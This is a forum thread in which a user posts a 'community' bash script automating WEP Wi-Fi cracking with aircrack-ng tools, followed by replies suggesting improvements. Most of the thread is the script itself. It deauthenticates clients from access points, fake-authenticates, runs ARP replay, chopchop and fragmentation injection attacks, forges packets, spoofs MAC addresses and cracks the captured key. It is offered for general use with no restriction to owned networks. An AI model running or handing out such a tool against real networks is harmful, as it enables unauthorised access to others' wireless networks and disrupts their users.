Results 1 to 3 of 3

Thread: Community wep script

Hybrid View

  1. #1
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default Community wep script

    Let me start by saying this is not made for people that dont already know the commands. If you haven't done it all on your own already look some other place for help.

    I wrote this because i got sick of typing everything in over and over again. While it doesn't support everything it does enough. Its still always best to do the more advanced attacks on your own as its hard to script them. I have tried most every script out there including the spoonwep, each falls short of what i wanted in there own special way.

    Anyways as the title says this is community .. meaning any idea you have "if its decent" will be implemented, and ill see what i can do about getting it included in the final once its polished off. Big thanks to everyone on irc who puts up with me .. cheers =]

    #!/bin/bash
    # vvpalins community wepscript
    # wepscript.sh

    echo "######################################"
    echo "##### PLEASE ENTER THE INTERFACE #####"
    echo "######################################"
    read ADAPTER

    function apname {
    echo "######################################"
    echo "##### TYPE THE ESSID OF THE AP #######"
    echo "######################################"
    read AP
    }

    function clientname {
    echo "######################################"
    echo "####### TYPE THE CLIENTS MAC #########"
    echo "######################################"
    read CLIENT
    }

    function repeat {

    clear
    echo "######################################"
    echo "#### TYPE *up* TO BRING UP ADAPTER ###"
    echo "######################################"
    echo "#### TYPE /\finish him/\ TO CRACK ####"
    echo "######################################"
    echo "0. Airodump-ng"
    echo "1. Test Injection"
    echo "2. Deauth all from AP"
    echo "3. Deauth client from AP"
    echo "4. Fake auth to AP"
    echo "5. Arpreplay"
    echo "6. Arpreplay with packet size"
    echo "7. p0821"
    echo "8. Chop Chop Attack"
    echo "9. Forge and inject packet"
    echo "10. Change your MAC"

    read OPTION


    if [ "$OPTION" = "up" ]
    then
    killall dhclient
    killall NetworkManager
    killall wpa_supplicant
    ifconfig $ADAPTER down
    airmon-ng check kill
    airmon-ng stop $ADAPTER
    airmon-ng stop mon0
    airmon-ng stop mon1
    macchanger --mac 00:11:22:33:44:55 $ADAPTER
    airmon-ng start $ADAPTER
    terminator -e "airodump-ng --berlin 10 $ADAPTER; bash" &
    clear
    fi


    if [ "$OPTION" = "0" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi
    echo "type the channel number"
    read CHAN
    terminator -e "airodump-ng -c $CHAN -w new --bssid $AP $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "1" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi
    terminator -e "aireplay-ng -9 -a $AP $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "2" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi
    terminator -e "aireplay-ng -0 0 -a $AP $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "3" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -0 0 -a $AP -c $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "4" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -1 2000 -a $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "5" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -3 -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "6" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -3 -x 1000 -n 100000 -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "7" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "8" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -4 -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "9" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    XOR=$(ls | grep "replay.*\.xor" | cut -d " " -f 5)
    packetforge-ng -0 -a $AP -h $CLIENT -k 255.255.255.255 -l 255.255.255.255.255 -y $XOR -w arp-request
    terminator -e "aireplay-ng -2 -r arp-request $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "10" ]
    then
    echo "What mac do you want to change to?"
    echo "If you want a random mac type random"
    read MAC
    if [ "$MAC" = "random" ]
    then
    clear
    macchanger -r $ADAPTER
    sleep 4
    else
    clear
    macchanger -m $MAC $ADAPTER
    sleep 4
    fi
    fi


    if [ "$OPTION" = "finish him" ]
    then
    terminator -e "aircrack-ng -a wep *.cap; bash" &
    fi


    }


    for (( ; ; ))
    do
    repeat
    done
    Remember this is only going to be as good as you guys make it so please post suggestions.

    pastebin - collaborative debugging tool
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  2. #2
    Member
    Join Date
    May 2009
    Posts
    102

    Default finish him!

    Nice "finish him" instruction. =) i wonder what's the need of changing mac address other than when dealing with mac filtered APs...

  3. #3
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by wif1bust3r View Post
    Nice "finish him" instruction. =) i wonder what's the need of changing mac address other than when dealing with mac filtered APs...
    Sometimes when we're testing incident response teams we change our MAC's quite regularly (mostly into what dirty words we can) to confuse them as we hit each AP and/or Switch in turn (802.11 or 802.3). There are valid uses for it.

    Am I the only person who still uses airoscript-ng?

    But, suggestions, perhaps an automatic attack section for clientless and cliented. I have two scripts for such a purpose on my BT laptop (far easier to type cless.sh apinfo.txt!) which read BSSID, ESSID, CHANNEL and maybe CLIENT from a txt file. It sort of removes the need to be fiddling around for a while with each command manually - you can just hit Enter as it goes.

    Might be a good suggestion, might be a bad one.

    Maybe swap terminator for xterm or something a little more common. That could be preference though, if I'm not in xterm it's Eterm or Konsole.

    My $0.02
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •